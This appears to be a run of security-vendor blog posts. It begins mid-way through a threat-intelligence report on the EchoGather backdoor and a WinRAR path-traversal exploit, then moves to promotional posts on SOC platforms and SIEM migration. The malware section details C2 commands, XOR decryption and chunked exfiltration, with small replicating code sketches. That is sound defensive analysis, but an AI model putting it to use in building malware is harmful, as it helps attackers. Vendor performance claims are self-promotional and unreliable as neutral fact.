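    urllib.request.urlopen(req)            # the sample uses WinHTTP and ignores TLS errors
    time.sleep(random.uniform(300, 360))   # randomized 300-360 second interval, as observed
```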

Supported commands 

EchoGather supports four commands. 

All outgoing communication with the C2 is encoded using standard Base64. When a command is received from the C2, the first 36 bytes contain the request ID, a unique identifier used when the backdoor needs to send information in several packages.

0x54 Remote Command Execution

EchoGather first extracts the request ID, followed by the command that needs to be executed. It then decrypts the string cmd.exe /C %s using a hardcoded XOR key (0xCA), which serves as a template for command execution. Using this template, it executes the specified command via cmd.exe. The output of the command is captured through a pipe and sent back to the C2 server, with the request ID prepended to the response.
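The string decryption is a single-byte XOR and is easy to replicate. A sketch that round-trips the command template with the hardcoded key from the sample (the request-ID handling is omitted):

```python
KEY = 0xCA  # hardcoded single-byte XOR key from the sample

def xor(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)

at_rest = xor(b"cmd.exe /C %s", KEY)          # how the template is stored in the binary
assert xor(at_rest, KEY) == b"cmd.exe /C %s"  # single-byte XOR is its own inverse
print(at_rest.hex())
```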

0x45 Return Configuration

Sends the embedded configuration structure to the C2.

0x56 File Exfiltration

The backdoor begins by extracting a request ID and the name of the file to be exfiltrated. It opens the specified file, determines its total size, and calculates how many 512 KB chunks are required for transmission. A transfer header containing metadata about the chunk count and size is then sent to the C2 server. In response, the backdoor receives the request ID used to identify the session. The file is read and transmitted in chunks, with each chunk containing the request ID, chunk index, file tag, data length, and raw file data. 
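The chunking scheme is straightforward to model. An illustrative reader that yields the same 512 KB chunks with their indices (the real protocol’s header and field layout are simplified away):

```python
import os

CHUNK_SIZE = 512 * 1024  # 512 KB chunks, as used by EchoGather

def file_chunks(path: str):
    """Yield (chunk_index, data) pairs until the file is exhausted."""
    with open(path, "rb") as f:
        index = 0
        while (data := f.read(CHUNK_SIZE)):
            yield index, data
            index += 1

def total_chunks(path: str) -> int:
    # Sent ahead of the data in the transfer header (ceiling division).
    return -(-os.path.getsize(path) // CHUNK_SIZE)
```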

0x57 Remote File Write

EchoGather receives a filename from the C2 and writes the incoming data chunks to the system, reconstructing the file as the chunks arrive.

Infrastructure analysis

During our research we found two domains that were used by the threat actors.

IP Resolutions for fast-eda.my
  • The domain was registered on September 12, 2025.
  • The very first resolution, between September 12th and 14th, pointed to 199.59.243[.]228.
  • After that and until November 26th all of the resolutions were on Cloudflare instances. 
  • From September 18th to November 24th the domain was resolved to 172.64.80[.]1
  • On November 27th it was resolved to 94.103.3[.]82, an address geolocated to Russia.

When we looked up the files related to this domain on VirusTotal, we found 7 files.
Two of them are PowerShell scripts that load the backdoor: mswt.ps1 and a second script that was not submitted with a name.

The two scripts are identical, including their execution flow. Both first decode two Base64-encoded files: a PDF document and the EchoGather payload. The PDF is opened, while the payload is executed in the background. The document appears to be an invitation, written in Russian, to a concert for high-ranking officers. However, the PDF is AI-generated and contains several noticeable inconsistencies. For instance, the stamp in the lower right corner appears to be an AI-generated attempt at recreating Russia’s national emblem, the double-headed eagle, but the result resembles a distorted or bird-like figure rather than the intended symbol. The text also includes several errors. Some Cyrillic letters are incorrect, for example, the letter Д is used in place of Л in multiple instances, and the word праздиика is a misspelled version of праздника. Additionally, the phrase «с глубоким уважением приглашает» (translated as “with deep respect invites (you)”) is unnatural and not idiomatic in the context of formal Russian invitations.

Decoy document: an invitation to a concert.
IP Resolutions for ruzede.com
  • First seen on May 21, 2025, resolved to 162.255.119[.]43 and later to 5.45.85[.]43 until October 2nd.
  • On October 2nd it was resolved to IP addresses in Cloudflare.
  • From October 4th to November 26th the domain was resolved to the same address seen for the previous domain: 172.64.80[.]1
  • On November 26th it was resolved to 193.233.18[.]137, in Russia based on geolocation.
    • The IP address is linked to different malicious domains.

Using VirusTotal, we pivoted on the domain ruzede[.]com and identified a RAR archive that exploits CVE-2025-8088, a known WinRAR vulnerability that involves the abuse of NTFS alternate data streams (ADSes) in combination with path traversal. This flaw allows attackers to embed malicious content within seemingly harmless filenames by appending ADSes that include relative path traversal sequences.

The archive contains a file named Вх.письмо_Мипромторг.lnk:.._.._.._.._.._Roaming_Microsoft_Windows_run.bat 

When the archive is opened, WinRAR fails to properly sanitize these ADS paths and extracts the hidden data streams, placing them in unintended or sensitive locations such as %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup. 

File connected to the domain ruzede[.]com

The phrase “письмо Мипромторг” is misspelled; the correct form is “письмо Минпромторга.” This term refers to an official letter or communication issued by the Ministry of Industry and Trade of the Russian Federation (Минпромторг России). The same misspelling error is in the archive file name: Вх.письмо_Мипромторг.rar.

Essentially the file in the archive is a batch script that launches a hidden PowerShell process. This process navigates to a user-specific AppData directory, then downloads a PowerShell script named docc1.ps1 from a remote URL (https://2k-linep[.]com/upload/docc1.ps1) and saves it to the current working directory. The script is then executed via a new PowerShell instance with execution policy restrictions bypassed.

The downloaded script (docc1.ps1) extracts both a PDF file and an EchoGather payload, using a technique similar to the one described previously. However, in this instance, the embedded PDF differs from earlier samples. This document is allegedly sent from the deputy of the Ministry of Industry and Trade of the Russian Federation, asking for price justification documentation under the state defense order, focusing on violations of deadlines and reporting on pricing approval processes.

The companies listed with their emails on the top right side of the first page (Almaz-Antey, Shvabe, and the United Instrument-Making Corporation) are major Russian defense-industry and high-technology enterprises, and they might be the intended recipients of this decoy document.

Pages 1-3 of the decoy document.

The same vulnerability was used by several threat actors, including RomCom (Russia-aligned) and Paper Werewolf, a cyberespionage group targeting Russian organizations and active since 2022. In early August, BI.ZONE Threat Intelligence published a report about an ongoing Paper Werewolf campaign that exploits CVE-2025-6218, which affects WinRAR versions up to and including 7.11 and enables directory traversal attacks that allow malicious archives to extract files outside their intended directories, along with a second vulnerability, a zero-day at the time, that abuses ADSes for path traversal. The report doesn’t mention CVE-2025-8088, but based on the description we assume it is the same vulnerability.

Interestingly, we can see similarities between the decoy documents from that report and the document above. First, the decoy document in the report is named запрос Минпромторга РФ.pdf (Request of the Ministry of Industry and Trade of the Russian Federation.pdf), with no misspellings in the filename, and it refers to the same office. That document asks recipients to assess the impact of a specific government resolution on the production capacities of subsidy recipients. Next, both documents share the same template and structure: a red stamp on the left side, followed by the same information about the office, the date, and the request ID. Both documents contain a request for information to be submitted to a government-affiliated organization.

Attribution

Based on the shared infrastructure, such as the ruzede[.]com domain, as well as notable similarities in decoy document construction and the exploitation of the WinRAR vulnerability that leverages ADSes, we attribute this campaign to the Paper Werewolf (aka GOFFEE) threat group. The recent use of XLL files suggests that the group is experimenting with new delivery methods while continuing to rely on established infrastructure, possibly in an attempt to evade detection. In addition, the use of a new, yet simple, backdoor may indicate an effort to improve and evolve their toolset.

Summary

It’s less common to see public reporting on threats targeting Russian organizations, which makes this campaign worth highlighting. The threat actor appears to be actively exploring new methods to evade detection, including the use of XLL-based delivery techniques and newly developed payloads. These changes suggest an effort to enhance their capabilities. However, there are still clear gaps in both technical execution and linguistic accuracy, indicating that their tradecraft is still developing. 

IOCs

XLL Loader

0506a6fcee0d4bf731f1825484582180978995a8f9b84fc59b6e631f720915da

EchoGather Hashes and C2 Infrastructure

sha256 | C2 Address
c3e04bb4f4d51bb1ae8e67ce72aff1c3abeca84523ea7137379f06eb347e1669 | https://ruzede[.]com/blogs/drafts/publish/schedule/seosso/login/mfa/verify/token/refresh/ips/blocklist/whitelist
0d1dd7a62f3ea0d0fbeea905a48ae8794f49319ee0c34f15a3a871899404bf05
b2419afcfc24955b4439100706858d7e7fc9fdf8af0bb03b70e13d8eed52935c | https://fast-eda.my/dostavka/lavka/kategorii/zakuski/sushi/sety/skidki/regiony/msk/birylievo
23d917781e288a6fa9a1296404682e6cf47f11f2a09b7e4f340501bf92d68514
dd5a16d0132eb38f64293b8419bab3a3a80f48dc050129a8752989539a5c97bf
74fab6adc77307ef9767e710d97c885352763e68518b2109d860bb45e9d0a8eb

Other Files

sha256 | File name (based on VirusTotal)
b6914d702969bc92e8716ece92287c0f52fc129c6fb4796676a738b103a6e039 | mswt.ps1
29101c580b33b77b51a6afe389955b151a4d0913716b253672cc0c0a41e5ccc8 | N/A
cdc3355ae57cc371c6c0918c0b5451b9298fc7d7c7035fa4b24d0cd08af4122c | C:\Users\user\AppData\Roaming\Microsoft\Windows\docc1.ps1
dc2df351c306a314569b1eeaccf5046ce5a64df487fa51c907cb065e968bba80 | Вх.письмо_Мипромторг.lnk:.._.._.._.._.._Roaming_Microsoft_Windows_run.bat
76e4d344b3ec52d3f1a81de235022ad2b983eb868b001b93e56deee54ae593c5 | Вх.письмо_Мипромторг.rar
6a00b1ed5afcd63758b9be4bd1c870dbfe880a1a3d4e852bb05c92418d33e6da | invite.pdf
2abb9e7c155beaa3dcfa38682633dcbea42f07740385cac463e4ca5c6598b438 | (pdf document)

Explore which AI SOC platform is right for you.

The post Tracing a Paper Werewolf campaign through AI-generated decoys and Excel XLLs appeared first on Intezer.


Intezer named a top-tier Solutions Partner in the Microsoft AI Cloud partner program

Security teams that rely on Microsoft know the power of a deeply integrated security stack. Today, we’re proud to announce an important milestone that further strengthens that ecosystem.

Intezer has been named a top-tier Solutions Partner in the Microsoft AI Cloud Partner Program (MAICPP), a designation reserved for solutions that meet Microsoft’s highest standards for security, architecture, and seamless cloud integration.

This recognition follows a successful Microsoft technical audit and certifies the Intezer Forensic AI SOC platform as trusted, Microsoft-validated software designed to deliver real security outcomes for modern SOC teams.

Join AI SOC Live on January 6th to see how to maximize your Microsoft Security investment with Forensic AI SOC. January 6th | 9am PT | 12pm EST.

Strengthening Microsoft-driven SOCs with Forensic AI

Microsoft security tools generate powerful signals, but signals alone don’t equal outcomes. SOC teams still face alert overload, limited context, and the constant risk that real threats hide in low- or medium-severity alerts.

The Intezer Forensic AI SOC platform was built to solve this problem.

Intezer strengthens the outcomes of Microsoft-driven SOCs by combining agentic AI with automated forensic investigation, enriching Microsoft alerts with deep technical evidence and cross-platform context. The platform investigates alerts from and across:

  • Microsoft Defender for Endpoint
  • Microsoft Defender for Identity (Entra ID)
  • Microsoft Defender for Office 365 and reported phishing
  • Microsoft Sentinel
  • Microsoft Defender for Cloud
  • Non-Microsoft security tools across endpoint, identity, cloud, email, and network environments

Instead of triaging only “high severity” alerts, Intezer investigates every alert, automatically querying Microsoft Sentinel whenever needed to enrich alerts, correlate logs, and validate activity. This provides visibility into every incident without manual lookups or tool switching.

How Intezer delivers better SOC outcomes on Microsoft

24/7 AI-powered triage and investigation

Intezer automatically triages and investigates 100% of alerts, including low- and medium-severity alerts that are commonly ignored. By mirroring how expert human analysts investigate incidents, using multiple AI models combined with deterministic forensics, Intezer delivers speed without sacrificing accuracy.

Less than 4% of alerts escalated, higher confidence decisions

Across Microsoft and non-Microsoft alerts, fewer than 4% are escalated to human analysts. Each verdict is backed by forensic evidence, reducing noise, eliminating guesswork, and enabling analysts to focus only on what truly matters.

Faster response with native Microsoft actions

Intezer enables automated remediation directly through Microsoft tools, including:

  • Device isolation via Defender for Endpoint
  • User lockout through Entra ID
  • Email quarantine in Defender for Office 365
  • Interactive response via Microsoft Teams

This tight integration allows teams to move from alert to action in minutes, without switching tools or workflows.

Built to maximize the value of Microsoft security investments

“This designation reflects our commitment to helping organizations get the most out of their Microsoft security investments,” said Itai Tevet, CEO and co-founder of Intezer.
“As a top-tier Solutions Partner in the Microsoft AI Cloud Partner Program, we deliver AI-powered, forensic-grade investigations that strengthen the security outcomes of SOC teams using Defender, Sentinel, and the broader Microsoft Security Suite. We help teams move from alerts to clear, confident decisions in minutes.”

Intezer customers can also purchase directly through the Microsoft Azure Marketplace and apply existing Azure credits, simplifying procurement and accelerating time to value.

What the MAICPP designation means for security teams

The Microsoft AI Cloud Partner Program recognizes partners whose solutions are proven to work at scale across the Microsoft Cloud. Achieving top-tier Solutions Partner status signals that Intezer:

  • Meets Microsoft’s highest standards for security, reliability, and architectural excellence
  • Integrates deeply and natively across the Microsoft Security Suite
  • Delivers validated customer impact for organizations operating on Microsoft infrastructure

For customers, this designation provides confidence that Intezer is not just compatible with Microsoft security, but purpose-built to extend and elevate it.

Why this matters now

As SOCs face increasing alert volumes, tighter budgets, and a growing shortage of skilled analysts, automation alone is no longer enough. Security teams need forensic-grade AI that can explain why an alert matters, not just label it.

The MAICPP designation confirms that Intezer delivers exactly that:

  • Enterprise-grade accuracy
  • Microsoft-validated integrations
  • Proven SOC efficiency at scale

For organizations running on Microsoft, Intezer is now officially recognized as a trusted partner to help transform alerts into outcomes.

Learn more about Intezer Forensic AI SOC for Microsoft or get started today through the Azure Marketplace.

The post Intezer named a top-tier Solutions Partner in the Microsoft AI Cloud partner program appeared first on Intezer.


Comprehensive Google SecOps migration checklist for CISOs and SOC leaders

There’s a clear trend emerging: many organizations are transitioning from legacy SIEMs to Google SecOps. While the Google SIEM platform is powerful, in our experience working with enterprise clients, that power only reveals itself when security leaders make three early decisions correctly:

  • Detection strategy: Whether to migrate existing rules or start fresh with a green-field approach.
  • Data onboarding: How to scale ingestion across multi-cloud environments without breaking pipelines.
  • Operating model: Building workflows that prevent “alert debt” from piling up on day one.

The strategic message is clear. Treat SIEM detection management with the same diligence you treat core security architecture, and augment your analysts with AI-powered triage so your humans can focus on higher-order investigations.

Here’s a practical checklist for discovery, migration, and operational success, designed for CISOs and SOC leaders evaluating a move to Google SecOps.

NOTE: This blog post is relevant to anyone considering a Chronicle SIEM migration, as Google SecOps is the new Google branding for Chronicle.

The tl;dr version of the Google SIEM migration checklist 

Phase | Key focus
Pre-migration | Inventory, pain-point assessment, business justification
Migration | Tool selection, data ingestion, rule/dashboard migration, integration, governance & risk
Post-migration | Measurement of success, continuous improvement, cost optimisation, governance & reporting

Full Google SecOps migration checklist

Let’s dive into the details for each phase of the migration process.

Pre-migration checklist: Establishing the baseline

  1. Inventory current environment
    • Catalogue all data sources feeding Splunk: log types, volumes (GB/day), retention policies, on-prem vs cloud vs multi-cloud.
    • Map all current detections, dashboards, reports, playbooks, SOAR workflows.
    • Identify any compliance/regulatory retention obligations (audit logs, legal hold).
    • Establish current licensing costs, infrastructure (forwarders, indexers), staffing.
  2. Assess SIEM performance & pain points
    • Are you seeing cost escalation vs benefit (slower detection, high false positives, low automation)?
    • Is the SIEM struggling with data volume growth, scalability, multi-cloud telemetry?
    • Are SOC analysts spending more time on infrastructure/configuration than investigations?
    • Are you able to integrate newer requirements (cloud workloads, containers, IoT/OT, multi-cloud) effectively? This 451 Research report indicates many orgs run multiple SIEMs due to tool sprawl.
  3. Define business & security objectives
    • What do you hope to achieve? E.g., faster detection/response, lower cost, improved coverages, cloud alignment.
    • What are the key metrics: mean time to detect (MTTD), mean time to respond (MTTR), cost-per-alert, false positive rate, regulatory coverage, etc.
    • What is your target SOC maturity in e.g., 12-24 months? Are you planning a cloud-first strategy, heavier automation/AI, less on-prem infrastructure?
  4. Build the migration justification
    • Prepare a comparative TCO/ROI: legacy SIEM vs cloud-native. Google SecOps materials highlight the cost benefit and claim, for example, that you can “ingest and analyse your data at Google speed and scale”.
    • Understand what it will cost to migrate: re-write detections, dashboards, data flows, training, potential downtime.
    • Present risk assessment: What happens if you don’t migrate (risk of obsolete tool, scaling failure, cost spirals)? The “Great SIEM Migration” guide argues that legacy tools may become “dinosaurs”.

Migration-phase checklist: Executing the transition

  1. Select migration path & vendor/partner support
  2. Data ingestion, normalization & compatibility
    • Ensure all of your log types/sources in Splunk are supported by the new platform. Google SecOps supports ingestion of Splunk CIM logs.
    • Plan for data mapping: Splunk field names, dashboards, custom fields → new schema.
    • Address historic data: Will you migrate archives? Will you keep Splunk as store-only? Community posts warn that mapping old archives can be complex.
    • Validate performance: test ingestion, query latency, retention policies on the new platform.
  3. Detection rules, dashboards, SOAR workflows
    • Catalogue existing detection rules, dashboards, SOAR playbooks in Splunk.
    • Determine which can be reused and which need rewriting. Ensure parity: detection coverage, mapping to MITRE ATT&CK, business use-cases. Splunk claims a strong out-of-the-box detection library.
    • Build and test new rules/playbooks in Google SecOps; validate they meet or exceed current performance (MTTD, MTTR, false positives).
    • Ensure analyst training and new workflows are adopted: new UI, new query language, new incident-investigation flows (Google SecOps offers “Gemini in security operations” natural-language assistant).
  4. Integration & ecosystem fit
    • Ensure that Google SecOps integrates with your existing tool-stack (EDR, identity, network, cloud logs, SOAR, threat intel). Google advertises 300+ SOAR integrations.
    • Confirm multi-cloud/on-prem data ingestion: check vendor statements.
    • Validate APIs, custom connectors, forwarder architecture. Splunk vs Google SecOps comparison note: Splunk emphasizes hybrid flexibility.
  5. Governance, compliance & retention
    • Check how historic data will be retained, archived, accessed, both for compliance (audits/regulators) and investigations.
    • Confirm where the data resides (region/residency rules), encryption, access controls. Google SecOps claims to treat all data as first-party.
    • Align on SLAs, incident response metrics, roles & responsibilities.
    • Define cut-over strategy: Will Splunk be decommissioned or kept in read-only mode? Define freeze date, dual-runs, parallel operations.
  6. Risk management & business continuity
    • Define fallback/rollback plans: If the new platform fails, do you have the old SIEM in warm standby?
    • Monitor for data loss or misalignment during migration (NXLog warns of these risks).
    • Communicate to stakeholders: SOC analysts, business units, auditors. Ensure training and change-management.
    • Set benchmarks and metrics: time to detect/resolve on the new platform vs. the old; cost per alert; staff utilization; alert volumes; false positives.
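
As referenced in step 3 above, here is a minimal inventory sketch for cataloguing Splunk saved searches ahead of the rewrite effort. It uses Splunk's REST API for saved searches; the host, credentials, and the crude "needs rework" heuristics are assumptions to adapt to your environment.

```python
# Pull every saved search from the Splunk management API so each one can be
# classified as migrate / rewrite / retire. Hostname and credentials below
# are hypothetical placeholders.
import requests

SPLUNK = "https://splunk.example.com:8089"   # management port (assumption)
AUTH = ("svc_migration", "change-me")        # or use a session/bearer token

resp = requests.get(
    f"{SPLUNK}/services/saved/searches",
    params={"output_mode": "json", "count": 0},  # count=0 returns all entries
    auth=AUTH,
    verify=True,
)
resp.raise_for_status()

inventory = []
for entry in resp.json()["entry"]:
    spl = entry["content"].get("search", "")
    inventory.append({
        "name": entry["name"],
        "disabled": entry["content"].get("disabled", False),
        # Crude heuristic: lookups and macros usually need manual rework
        # before the logic can be re-expressed (e.g., as a YARA-L rule).
        "needs_rework": ("lookup" in spl) or ("`" in spl),
    })

for item in sorted(inventory, key=lambda i: i["needs_rework"], reverse=True):
    status = "REWORK" if item["needs_rework"] else "REVIEW"
    print(f"{status:6} {item['name']}")
```

The output is a simple worklist: searches flagged REWORK contain constructs that rarely translate mechanically, while the rest are candidates for near-direct porting.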

Post-migration checklist: Optimizing & sustaining value

  1. Validate outcomes & measure success
    • Measure MTTD, MTTR, alert volumes, and analyst productivity pre- and post-migration (a minimal comparison sketch follows this checklist).
    • Compare actual cost savings vs business case.
    • Assess detection coverage: Are all critical use-cases still covered? Are any gaps emerging?
    • Run periodic health checks (some vendors like CardinalOps offer detection-rule health monitoring with MITRE ATT&CK coverage for Google SecOps).
  2. Continuous improvement & SOC maturity evolution
    • SOC maturity doesn’t stop at migration. Use freed-up resources to focus on advanced use-cases (threat hunting, proactive detection, automation, investigations).
    • Tune detection rules, remove noise, refine playbooks.
    • Leverage AI/natural-language features (Google SecOps touts “Gemini in security operations”).
    • Plan for future: hybrid/multi-cloud expansions, new telemetry sources, OT/IoT, supply-chain threats.
  3. Decommission legacy infrastructure & optimize cost
    • If the migration path included decommissioning the old SIEM (or reducing its role), ensure you turn off unneeded licenses and infrastructure.
    • Monitor the cost model of the new platform (ingestion volumes, retention policies) to ensure you don’t inadvertently pay for excess.
    • Re-allocate freed resources (licenses, server hardware, staff time) into SOC capability rather than maintenance.
  4. Governance, audit and stakeholder reporting
    • Update your SOC governance frameworks: incident-response playbooks, escalation paths, KPIs aligned with the new platform.
    • Communicate to board/executive leadership key outcomes: improved detection/response, cost rationalization, strategic alignment.
    • Ensure audit/compliance reports reflect the new tooling (document changes, validate controls).
    • Set up periodic reviews of tool performance, vendor roadmap, SOC maturity.
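
As referenced in step 1 above, here is a minimal pre/post comparison sketch for the success-validation step. The baseline and post-migration samples are placeholder assumptions; pull the real values from the old and new platforms' reporting.

```python
# Compare median detection/response times before and after migration.
# All numbers are fabricated examples for illustration.
from statistics import median

baseline = {"mttd_min": [95, 120, 80, 150], "mttr_min": [240, 300, 210]}
post_migration = {"mttd_min": [35, 42, 28, 51], "mttr_min": [90, 120, 75]}

for metric, before_samples in baseline.items():
    before = median(before_samples)
    after = median(post_migration[metric])
    reduction = (before - after) / before * 100
    print(f"{metric}: {before:.0f} -> {after:.0f} min "
          f"({reduction:.0f}% reduction)")
```

Tracking these deltas monthly, rather than once at cut-over, is what turns the migration business case into an ongoing accountability report.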

Final thoughts

Migrating to Google SecOps isn’t a simple platform swap; it’s a redesign of how your SOC operates. The upside: cost efficiency, scale, and automation gains can be immediate. The risks: migration complexity, content gaps, and operational disruption are real and must be managed deliberately.

As a CISO or SOC leader, treat this as a transformation program. Use the table and/or the full checklist above to drive decisions; follow a strategic landing plan to sequence the work; and anchor on the three non-negotiables outlined above:

  1. A clear detection strategy (migrate only if the value is there; rebuild the rest in YARA-L),
  2. Data onboarding at scale with a parser matrix and cost guardrails, and
  3. An operating model that prevents alert debt from day one through automation and measurable KPIs.

If you want help getting there faster, we can provide: a SIEM jumpstart (curated and bespoke YARA-L rules, MITRE gap analysis and coverage, detection reviews, and continuous improvement with Intezer engineers); a parser/ingestion plan for multi-cloud; and, of course, Intezer Forensic AI SOC’s triage to deliver, from day one, 100% alert coverage with full auditability, so your analysts focus on the few cases that truly need their context and expertise.

Learn more about how Intezer can help you with your SecOps migration.

Top 15 AI SOC Tools for 2026: SOC Automation Compared

The Security Operations Center (SOC) has always been the heart of enterprise defense, but in 2026, it’s evolving faster than ever.

The rise of AI-driven SOC platforms, often referred to as Agentic AI SOCs, is redefining how enterprises detect, investigate, and respond to threats.

For years, security teams relied on a mix of SIEM, EDR, and MDR vendors to stay ahead of attacks. But these stacks often created their own problems: endless alert noise, long investigation times, and an overworked analyst team stuck in repetitive triage.

The new generation of AI SOC platforms changes that. They leverage large language models (LLMs), enabling SOCs to automatically triage and investigate every alert in minutes, not hours.

In this guide, we’ll break down the Top 15 AI SOC platforms to watch in 2026, ranked by how they balance speed, accuracy, explainability, and coverage across modern enterprise environments.

What is an Agentic AI SOC?

“Agentic” AI refers to systems that don’t just respond; they act. In cybersecurity, an Agentic AI SOC is capable of performing end-to-end investigations, drawing conclusions, and recommending (or executing) responses based on forensic evidence and reasoning.

These platforms are trained not only to summarize alerts but to understand their context, correlating data across endpoints, identities, networks, and cloud systems.

The best AI SOCs of 2026 are explainable, autonomous, and fast, providing the confidence enterprises need to trust machine-led decision-making.

Top AI SOC platforms in 2026 comparison table

| Platform | Best for | Key strength |
| --- | --- | --- |
| Intezer (Forensic AI SOC) | Large enterprises | Forensic-level, explainable investigations |
| 7AI | Enterprises exploring multi-agent automation | Multi-agent orchestration |
| AiStrike | Mid-market SOCs | Affordable automated triage |
| SentinelOne (Purple AI) | Enterprises using SentinelOne EDR | Integrated SOC automation |
| CrowdStrike (Charlotte AI) | Falcon ecosystem users | Generative AI for summaries |
| BlinkOps | Security automation teams | Playbook-based automation |
| Bricklayer AI | Startups | Lightweight triage and reporting |
| Conifers.ai | Cloud-native companies | Cloud-first visibility |
| Vectra AI | Mature SOCs | Network threat detection |
| Dropzone AI | SOC automation innovators | Human-in-the-loop design |
| Exaforce | Minimizing SIEM cost | Alert routing and prioritization |
| Legion Security | SOCs with expert analysts | Workflow management |
| Prophet.ai | Predictive threat modeling | Proactive threat detection |
| Qevlar AI | LLM-driven SOCs | AI triage experiments |
| Radiant Security | Mid-market enterprises | Response recommendations |

1. Intezer: Best AI SOC platform for enterprise SOCs

Best for: Large enterprises that prioritize speed, accuracy, and complete alert coverage.

Intezer Forensic AI SOC is built for enterprises and MSSPs, and is trusted by global brands including NVIDIA, Salesforce, MGM Resorts, Equifax, and Ferguson.
Intezer investigates 100% of alerts in under two minutes with 98% accuracy.

Unlike other platforms that rely solely on LLM-generated heuristics, Intezer fuses human-like reasoning with multiple AI models and deterministic forensic methods, including code analysis, sandboxing, reverse engineering, and memory forensics.
The result is evidence-backed, explainable verdicts that eliminate the guesswork for SOC analysts.

For enterprises managing millions of alerts across SIEM, EDR, cloud, and identity systems, Intezer delivers full alert coverage and eliminates the low-severity blind spots that MDRs often ignore.

With endpoint-based pricing, Intezer removes the “alert tax” of data-ingest models and helps SOC leaders prove ROI to their boards, without expanding headcount.

Why enterprises choose Intezer

  • 100% alert investigation coverage across SIEM, EDR, phishing, identity, and cloud
  • Sub-2-minute investigations with 98% accuracy
  • Transparent, explainable verdicts
  • Trusted by Fortune 500 enterprises
  • Predictable ROI and cost efficiency

Experience Intezer in action with a custom demo.

Hear what the CTO of MGM Resorts has to say about Intezer.

2. 7AI: Best for multi-agent SOC automation

7AI is one of the most experimental platforms in the 2026 AI SOC space. It focuses on multi-agent orchestration, where separate AI agents collaborate to triage, enrich, and investigate alerts across different domains.

[Image: 7AI product screenshot]

While its architecture is impressive, 7AI is best suited for innovation-driven security teams that have strong engineering capacity and want to customize workflows. It performs well in large-scale EDR and cloud environments but requires fine-tuning for reliability.

Best for: Enterprises exploring multi-agent SOC architectures.

3. AiStrike: Best for mid-market SOCs

AiStrike targets the mid-market segment with a focus on cost-effective AI triage. It offers a simple, clean dashboard that connects with EDR and SIEM tools to automatically prioritize alerts. While its forensic depth is limited compared to enterprise-grade solutions, AiStrike delivers solid speed and automation for smaller SOCs.

[Image: AiStrike dashboard]

Best for: Mid-market SOCs that want affordable, plug-and-play AI investigations.

4. SentinelOne (Purple AI): Best for endpoint-centric SOCs

SentinelOne’s Purple AI brings native AI investigation and response into the SentinelOne platform. It’s tightly integrated with SentinelOne’s EDR and XDR stack, which makes it a strong option for organizations already committed to SentinelOne.

[Image: SentinelOne Purple AI product screenshot]

While Purple AI provides quick, summarized threat analysis and remediation recommendations, it focuses heavily on endpoints rather than full enterprise coverage.

Best for: Enterprises deeply invested in SentinelOne’s ecosystem that want integrated AI triage.

5. CrowdStrike (Charlotte AI): Best for AI-driven summarization

CrowdStrike’s Charlotte AI is the generative assistant within the Falcon platform, built to help analysts ask natural-language questions and interpret alerts faster.

[Image: CrowdStrike Charlotte AI product screenshot]

While not a fully autonomous SOC, Charlotte AI improves analyst experience and productivity by summarizing incidents and surfacing relevant insights. It’s ideal for teams that want to augment analysts rather than automate full investigations.

Best for: Enterprises using the CrowdStrike Falcon suite that want faster analyst assistance.

6. BlinkOps: Best for automation engineers

BlinkOps focuses on workflow automation, not investigations per se. It enables security teams to build playbooks and automation pipelines that connect multiple tools (SIEM, EDR, IAM, etc.).

[Image: BlinkOps product screenshot]

While it doesn’t deliver forensic-level verdicts, BlinkOps is popular among DevSecOps teams that want custom automation flexibility.

Best for: Security engineers looking to automate existing SOC workflows.

7. Bricklayer AI: Best for startups and lean SOCs

Bricklayer AI provides lightweight alert triage and reporting capabilities. It’s built for smaller organizations that want to reduce alert fatigue without complex integrations. Its simplicity and affordability make it a solid entry point for teams without mature SOC processes.

Best for: Startups building early SOC capabilities on a budget.

8. Conifers.ai: Best for cloud-native companies

Conifers.ai specializes in cloud-first security visibility across AWS, Azure, and Google Cloud. Its AI models excel at correlating identity, network, and workload activity to flag potential breaches.

[Image: Conifers.ai dashboard]

It’s not a full SOC replacement, but it significantly enhances cloud investigation and response.

Best for: Cloud-first organizations seeking AI-enhanced detection and context.

9. Vectra AI: Best for network and identity threat detection

Vectra AI has long been a leader in AI-driven network detection and response (NDR). Its platform now extends into AI SOC territory, combining real-time detection with contextual identity analysis.

[Image: Vectra AI product screenshot]

Vectra is strong in hybrid environments but remains specialized in network telemetry rather than full-stack coverage.

Best for: Enterprises prioritizing network and identity visibility.

10. Dropzone AI: Best for SOC automation innovators

Dropzone AI represents the new wave of human-in-the-loop SOC automation. It allows analysts to supervise and approve actions initiated by AI, blending human expertise with autonomous investigation.

[Image: Dropzone AI product screenshot]

While not as proven in large enterprises as Intezer, Dropzone’s agentic architecture makes it an intriguing option for forward-thinking SOCs.

Best for: SOCs experimenting with supervised AI autonomy.

Read about what CISOs are looking for in an AI SOC platform

11. Exaforce: Best for minimizing SIEM cost

Exaforce uses a multi-model AI engine to reduce alert overload, accelerate investigations, and expand detection coverage without relying on a traditional SIEM. Its AI stack, combining data-ingestion models, behavioral machine learning, and large language models, analyzes real-time telemetry while cutting SIEM-related storage and licensing costs.

[Image: Exaforce product screenshot]

The platform adapts quickly through feedback loops and natural-language business context, continuously refining accuracy and reducing false positives. With investigative graph visualizations and flexible deployment options, Exaforce helps streamline complex investigations.

Best for: Companies struggling with excessive SIEM spend.

12. Legion Security: Best for companies with expert human analysts

Legion automates SOC investigations by capturing and operationalizing real analyst decision-making. Its browser-based agent records every step of an analyst’s workflow (data reviewed, actions taken, judgments made) and then creates reusable investigative logic.

[Image: Legion Security product screenshot]

These recordings evolve into living agents that can be replayed, tested, refined, and re-executed across new alerts. Legion offers flexible deployment options (cloud, hybrid, or customer-hosted) to support diverse security and compliance requirements.

Best for: Organizations with expert human analysts looking to create custom AI agents that mirror their in-house best practices and knowledge.

13. Prophet Security: Best for predictive SOCs

Prophet focuses on automated alert resolution using agentic reasoning that mirrors how experienced analysts assess user behavior, asset context, and threat indicators. It enriches alerts with data from endpoints, cloud systems, identity platforms, and threat intelligence to deliver high-confidence dispositions without relying on static rules. The platform supports flexible automation, from fully automated closure of benign alerts to analyst-in-the-loop escalation, and includes a copilot-style natural language interface for deeper investigation and threat hunting. 

Best for: Enterprises investing in predictive threat modeling and trend forecasting.

14. Qevlar AI: Best for experimental SOCs

